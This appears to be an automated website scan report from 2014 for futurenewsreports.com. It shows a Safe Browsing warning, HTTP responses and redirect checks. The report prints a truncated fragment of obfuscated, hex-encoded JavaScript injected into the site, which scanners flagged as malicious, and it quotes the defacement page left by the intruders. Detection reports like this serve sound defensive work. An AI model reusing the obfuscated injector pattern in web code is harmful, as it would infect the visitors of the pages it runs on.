Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=futurenewsreports.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://futurenewsreports.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 08 Jul 2014 01:08:09 GMT Location: http://www.futurenewsreports.com/ Server: Apache Content-Length: 312 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.futurenewsreports.com/ | 200 OK Content-Length: 9428 Content-Type: text/html | suspicious |
Malicious code - confirmed by antiviruses (see below) pjhxz=String;zskxxo="spl"+"i"+"t";wjdg=window;dunbli=(1)?"0x":"123";fob=(5-3-1);try{if(Math.ceil(5.5)===0x6)--(document["b"+"ody"])}catch(ysj){edhqi=false;try{}catch(zen){edhqi=21;}if(1){hmlw="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq65Zq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq65Zq17Zq34Zq1 Antivirus reports:
Deface/Content modification. The following signature was found: HacKeD By 6aLBaN TeaM <html dir="rtl"> <head> <meta http-equiv="Content-Language" content="en-us"> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <title>HacKeD By 6aLBaN TeaM</title> <meta name="keywords" content="HacKeD By 6aLBaN TeaM"> <meta name="description" content="HacKeD By 6aLBaN TeaM"> </head> <body bgcolor="#000000"> <p align="center"><b><font color="#FFFFFF" size="4" face="Comic Sans MS">HacKeD By 6aLBaN TeaM</font></b></p> <p align="center"> <img border="0" src="http://img02.arabsh ...[9914 bytes skipped]... | ||
http://www.futurenewsreports.com/test404page.js | 404 Not Found Content-Length: 406 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: futurenewsreports.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 08 Jul 2014 01:08:09 GMT
Location: http://www.futurenewsreports.com/
Server: Apache
Content-Length: 312
Content-Type: text/html; charset=iso-8859-1
...312 bytes of data.
GET / HTTP/1.1
Host: futurenewsreports.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 08 Jul 2014 01:08:09 GMT
Location: http://www.futurenewsreports.com/
Server: Apache
Content-Length: 312
Content-Type: text/html; charset=iso-8859-1
...312 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: futurenewsreports.com
Referer: http://www.google.com/search?q=futurenewsreports.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: futurenewsreports.com
Referer: http://www.google.com/search?q=futurenewsreports.com
Result:
The result is similar to the first query. There are no suspicious redirects found.